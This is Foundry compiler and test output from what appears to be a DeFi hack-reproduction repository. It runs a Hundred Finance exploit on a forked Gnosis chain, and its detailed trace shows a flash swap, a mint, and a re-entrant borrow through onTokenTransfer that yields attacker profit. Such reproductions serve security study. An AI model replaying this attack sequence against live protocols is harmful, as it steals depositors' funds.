Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/HundredFinance_exp.sol:86:28:
   |
86 |     function uniswapV2Call(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                            ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/HundredFinance_exp.sol:90:62:
   |
90 |     function attackLogic(uint256 _amount0, uint256 _amount1, bytes calldata _data) internal {
   |                                                              ^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2022-03/HundredFinance_exp.sol:130:45:
    |
130 |     function onTokenTransfer(address _from, uint256 _value, bytes memory _data) external {
    |                                             ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2022-03/HundredFinance_exp.sol:130:61:
    |
130 |     function onTokenTransfer(address _from, uint256 _value, bytes memory _data) external {
    |                                                             ^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 614.15ms (1.82ms CPU time)

Ran 1 test for src/test/2022-03/HundredFinance_exp.sol:ContractTest
[PASS] testExploit() (gas: 842294)
Logs:
  Borrowed: 2117785 USDC from Sushi
  ''i'm in!''
  Attacker xdai Balance After Borrow: 792294331853537723935 XDAI
  Hundred xdai Balance After Borrow: 4438423354006375 Xdai
  Attacker USDC Balance After Borrow: 1906006 USDC
  Hundred USDC Balance After Borrow: 3991716 USDC
  Repay Flashloan for : 2124157 USDC
  Attacker Profit: 42994684 usdc

Traces:
  [3649] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("gnosis", 21120319 [2.112e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [952994] ContractTest::testExploit()
    ├─ [241] 0x1b02dA8Cb0d097eB8D57A175b88c7D8b47997506::factory() [staticcall]
    │   └─ ← [Return] 0xc35DADB65012eC5796536bD9864eD8773aBc74C4
    ├─ [2644] 0xc35DADB65012eC5796536bD9864eD8773aBc74C4::getPair(0xe91D153E0b41518A2Ce8Dd3D7944Fa863463a97d, 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83) [staticcall]
    │   └─ ← [Return] 0xA227c72a4055A9DC949cAE24f54535fe890d3663
    ├─ [7810] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(0xA227c72a4055A9DC949cAE24f54535fe890d3663) [staticcall]
    │   ├─ [2858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(0xA227c72a4055A9DC949cAE24f54535fe890d3663) [delegatecall]
    │   │   └─ ← [Return] 2117785149059 [2.117e12]
    │   └─ ← [Return] 2117785149059 [2.117e12]
    ├─ [2449] 0xA227c72a4055A9DC949cAE24f54535fe890d3663::token0() [staticcall]
    │   └─ ← [Return] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83
    ├─ [449] 0xA227c72a4055A9DC949cAE24f54535fe890d3663::token0() [staticcall]
    │   └─ ← [Return] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83
    ├─ [920875] 0xA227c72a4055A9DC949cAE24f54535fe890d3663::swap(2117785149058 [2.117e12], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000023078000000000000000000000000000000000000000000000000000000000000)
    │   ├─ [34654] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2117785149058 [2.117e12])
    │   │   ├─ [34196] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2117785149058 [2.117e12]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0xA227c72a4055A9DC949cAE24f54535fe890d3663, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2117785149058 [2.117e12])
    │   │   │   ├─ [3750] ContractTest::onTokenTransfer(0xA227c72a4055A9DC949cAE24f54535fe890d3663, 2117785149058 [2.117e12], 0x)
    │   │   │   │   ├─ [241] 0x1b02dA8Cb0d097eB8D57A175b88c7D8b47997506::factory() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0xc35DADB65012eC5796536bD9864eD8773aBc74C4
    │   │   │   │   ├─ [644] 0xc35DADB65012eC5796536bD9864eD8773aBc74C4::getPair(0xe91D153E0b41518A2Ce8Dd3D7944Fa863463a97d, 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0xA227c72a4055A9DC949cAE24f54535fe890d3663
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x247cfacee8d2369ab62372795e3deae48743e5b679b4352ba759121141379394: 0x000000000000000000000000000000000000000000000000000001ed15d4de83 → 1
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000000000001ed15d4de82
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [850075] ContractTest::uniswapV2Call(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2117785149058 [2.117e12], 0, 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000023078000000000000000000000000000000000000000000000000000000000000)
    │   │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 2117785149058 [2.117e12]
    │   │   │   └─ ← [Return] 2117785149058 [2.117e12]
    │   │   ├─ [0] console::log("Borrowed: %s USDC from Sushi", 2117785 [2.117e6]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 2117785149058 [2.117e12]
    │   │   │   └─ ← [Return] 2117785149058 [2.117e12]
    │   │   ├─ [24967] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::approve(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, 2117785149058 [2.117e12])
    │   │   │   ├─ [24509] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::approve(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, 2117785149058 [2.117e12]) [delegatecall]
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, value: 2117785149058 [2.117e12])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb4e22f4cc4e7d96b0b8e442a49195fc1251bd5aeb6932e9b0df932d1c6496b34: 0 → 0x000000000000000000000000000000000000000000000000000001ed15d4de82
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [151375] 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee::mint(2117785149058 [2.117e12])
    │   │   │   ├─ [145537] 0xfCD8570AD81e6c77b8D252bEbEBA62ed980BD64D::mint(2117785149058 [2.117e12]) [delegatecall]
    │   │   │   │   ├─ [3310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   │   │   ├─ [2858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 3779937828053 [3.779e12]
    │   │   │   │   │   └─ ← [Return] 3779937828053 [3.779e12]
    │   │   │   │   ├─ [7803] 0x8a0d639f272F4B966b2dEa42d4b743Dce7E82c28::getBorrowRate(3779937828053 [3.779e12], 168016735377 [1.68e11], 1791667 [1.791e6]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000001922ef07
    │   │   │   │   ├─ emit AccrueInterest(cashPrior: 3779937828053 [3.779e12], interestAccumulated: 46835 [4.683e4], borrowIndex: 1000109733102372715 [1e18], totalBorrows: 168016782212 [1.68e11])
    │   │   │   │   ├─ [33427] 0x0F390559F258eB8591C8e31Cf0905E97cf36ACE2::mintAllowed(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2117785149058 [2.117e12])
    │   │   │   │   │   ├─ [28247] 0x376020c5B0ba3Fd603d7722381fAA06DA8078d8a::mintAllowed(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2117785149058 [2.117e12]) [delegatecall]
    │   │   │   │   │   │   ├─ [6661] 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   ├─ [4232] 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee::delegateToImplementation(0x70a082310000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [2575] 0xfCD8570AD81e6c77b8D252bEbEBA62ed980BD64D::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ emit DistributedSupplierComp(param0: 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 0)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xdbd18299ce1d0c3512b503bfbbcdc604ba8cea763a973cc0e7d07dc03bdaa1b2: 0x014242aa00000000000000000000000000000000000000000000000000000000 → 0x0142453f00000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 3779937828053 [3.779e12]
    │   │   │   │   │   └─ ← [Return] 3779937828053 [3.779e12]
    │   │   │   │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 3779937828053 [3.779e12]
    │   │   │   │   │   └─ ← [Return] 3779937828053 [3.779e12]
    │   │   │   │   ├─ [16068] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, 2117785149058 [2.117e12])
    │   │   │   │   │   ├─ [15604] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, 2117785149058 [2.117e12]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, value: 2117785149058 [2.117e12])
    │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, value: 0)
    │   │   │   │   │   │   ├─ [938] 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee::onTokenTransfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2117785149058 [2.117e12], 0x)
    │   │   │   │   │   │   │   ├─ [249] 0xfCD8570AD81e6c77b8D252bEbEBA62ed980BD64D::onTokenTransfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2117785149058 [2.117e12], 0x) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Revert] EvmError: Revert
    │   │   │   │   │   │   │   └─ ← [Revert] EvmError: Revert
    │   │   │   │   │   │   ├─ emit ContractFallbackCallFailed(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, : 2117785149058 [2.117e12])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb4e22f4cc4e7d96b0b8e442a49195fc1251bd5aeb6932e9b0df932d1c6496b34: 0x000000000000000000000000000000000000000000000000000001ed15d4de82 → 0
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000000000001ed15d4de82 → 0
    │   │   │   │   │   │   │   @ 0xb0baf91a48f76d3b336eb976e4575084bb7fc95f341a385f1ee991aa4af6602e: 0x0000000000000000000000000000000000000000000000000000037015d9fcd5 → 0x0000000000000000000000000000000000000000000000000000055d2baedb57
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 5897722977111 [5.897e12]
    │   │   │   │   │   └─ ← [Return] 5897722977111 [5.897e12]
    │   │   │   │   ├─ emit Mint(minter: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], mintAmount: 2117785149058 [2.117e12], mintTokens: 10588888520988515 [1.058e16])
    │   │   │   │   ├─ emit Transfer(from: 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10588888520988515 [1.058e16])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 13: 0x00000000000000000000000000000000000000000000000000462125d129b2d9 → 0x000000000000000000000000000000000000000000000000006bbfaf8c05ca3c
    │   │   │   │   │   @ 9: 0x00000000000000000000000000000000000000000000000000000000014242aa → 0x000000000000000000000000000000000000000000000000000000000142453f
    │   │   │   │   │   @ 10: 0x0000000000000000000000000000000000000000000000000de11a3ff8f58a3a → 0x0000000000000000000000000000000000000000000000000de11a80e1fa476b
    │   │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000000000000271e93ec91 → 0x000000000000000000000000000000000000000000000000000000271e94a384
    │   │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000000000000001b56b3 → 0x00000000000000000000000000000000000000000000000000000000001b68fe
    │   │   │   │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 0 → 0x00000000000000000000000000000000000000000000000000259e89badc1763
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [461105] 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee::borrow(1906006634152 [1.906e12])
    │   │   │   ├─ [459746] 0xfCD8570AD81e6c77b8D252bEbEBA62ed980BD64D::borrow(1906006634152 [1.906e12]) [delegatecall]
    │   │   │   │   ├─ [131144] 0x0F390559F258eB8591C8e31Cf0905E97cf36ACE2::borrowAllowed(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1906006634152 [1.906e12])
    │   │   │   │   │   ├─ [130454] 0x376020c5B0ba3Fd603d7722381fAA06DA8078d8a::borrowAllowed(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1906006634152 [1.906e12]) [delegatecall]
    │   │   │   │   │   │   ├─ emit MarketEntered(rToken: 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, account: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [26011] 0x10010069DE6bD5408A6dEd075Cf6ae2498073c73::getUnderlyingPrice(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   │   │   │   │   ├─ [15643] 0x26C31ac71010aF62E6B486D1132E266D6298857D::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   ├─ [7410] 0x30bA871Ee7a08dBd255CdD8e7e035DAd72014E27::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 160, 100000000 [1e8], 1647295595 [1.647e9], 1647295595 [1.647e9], 160
    │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419103392 [3.689e19], 100000000 [1e8], 1647295595 [1.647e9], 1647295595 [1.647e9], 36893488147419103392 [3.689e19]
    │   │   │   │   │   │   │   └─ ← [Return] 1000000000000000000000000000000 [1e30]
    │   │   │   │   │   │   ├─ [11154] 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   ├─ [8328] 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [6443] 0xfCD8570AD81e6c77b8D252bEbEBA62ed980BD64D::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 5897722977111 [5.897e12]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 5897722977111 [5.897e12]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0, 10588888520988515 [1.058e16], 0, 200000703082319 [2e14]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000259e89badc176300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b5e64adcaf4f
    │   │   │   │   │   │   │   └─ ← [Return] 0, 10588888520988515 [1.058e16], 0, 200000703082319 [2e14]
    │   │   │   │   │   │   ├─ [5011] 0x10010069DE6bD5408A6dEd075Cf6ae2498073c73::getUnderlyingPrice(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   │   │   │   │   ├─ [3143] 0x26C31ac71010aF62E6B486D1132E266D6298857D::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   ├─ [1410] 0x30bA871Ee7a08dBd255CdD8e7e035DAd72014E27::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 160, 100000000 [1e8], 1647295595 [1.647e9], 1647295595 [1.647e9], 160
    │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419103392 [3.689e19], 100000000 [1e8], 1647295595 [1.647e9], 1647295595 [1.647e9], 36893488147419103392 [3.689e19]
    │   │   │   │   │   │   │   └─ ← [Return] 1000000000000000000000000000000 [1e30]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0cf: 0 → 0x000000000000000000000000243e33aa7f6787154a8e59d3c27a66db3f8818ee
    │   │   │   │   │   │   │   @ 0xe6c21f6dbc8894ce0aa76bedb3efb730efcbae6fbd8c0d713f2ee4cbaebc204a: 0 → 1
    │   │   │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 1
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 5897722977111 [5.897e12]
    │   │   │   │   │   └─ ← [Return] 5897722977111 [5.897e12]
    │   │   │   │   ├─ [275717] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1906006634152 [1.906e12])
    │   │   │   │   │   ├─ [275259] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1906006634152 [1.906e12]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1906006634152 [1.906e12])
    │   │   │   │   │   │   ├─ [249613] ContractTest::onTokenTransfer(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee, 1906006634152 [1.906e12], 0x)
    │   │   │   │   │   │   │   ├─ [241] 0x1b02dA8Cb0d097eB8D57A175b88c7D8b47997506::factory() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0xc35DADB65012eC5796536bD9864eD8773aBc74C4
    │   │   │   │   │   │   │   ├─ [644] 0xc35DADB65012eC5796536bD9864eD8773aBc74C4::getPair(0xe91D153E0b41518A2Ce8Dd3D7944Fa863463a97d, 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0xA227c72a4055A9DC949cAE24f54535fe890d3663
    │   │   │   │   │   │   │   ├─ [0] console::log("''i'm in!''") [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [216122] 0x090a00A2De0EA83DEf700B5e216f87a5D4F394FE::borrow(1270671089434800000000000 [1.27e24])
    │   │   │   │   │   │   │   │   ├─ [1803] 0x8a0d639f272F4B966b2dEa42d4b743Dce7E82c28::getBorrowRate(1714513424835437554026891 [1.714e24], 183535395449146825729565 [1.835e23], 4624109393500995511 [4.624e18]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000391cff4b
    │   │   │   │   │   │   │   │   ├─ emit AccrueInterest(cashPrior: 1714513424835437554026891 [1.714e24], interestAccumulated: 635923946801634074 [6.359e17], borrowIndex: 1009179216124433227 [1.009e18], totalBorrows: 183536031373093627363639 [1.835e23])
    │   │   │   │   │   │   │   │   ├─ [122793] 0x0F390559F258eB8591C8e31Cf0905E97cf36ACE2::borrowAllowed(0x090a00A2De0EA83DEf700B5e216f87a5D4F394FE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1270671089434800000000000 [1.27e24])
    │   │   │   │   │   │   │   │   │   ├─ [122103] 0x376020c5B0ba3Fd603d7722381fAA06DA8078d8a::borrowAllowed(0x090a00A2De0EA83DEf700B5e216f87a5D4F394FE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1270671089434800000000000 [1.27e24]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ emit MarketEntered(rToken: 0x090a00A2De0EA83DEf700B5e216f87a5D4F394FE, account: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   │   │   │   ├─ [26011] 0x10010069DE6bD5408A6dEd075Cf6ae2498073c73::getUnderlyingPrice(0x090a00A2De0EA83DEf700B5e216f87a5D4F394FE) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [15643] 0x678df3415fc31947dA4324eC63212874be5a82f8::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [7410] 0xb65566283CAcE6b281308308da0f0783a613c416::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 154, 100003197 [1e8], 1647326310 [1.647e9], 1647326310 [1.647e9], 154
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419103386 [3.689e19], 100003197 [1e8], 1647326310 [1.647e9], 1647326310 [1.647e9], 36893488147419103386 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1000031970000000000 [1e18]
    │   │   │   │   │   │   │   │   │   │   ├─ [9154] 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
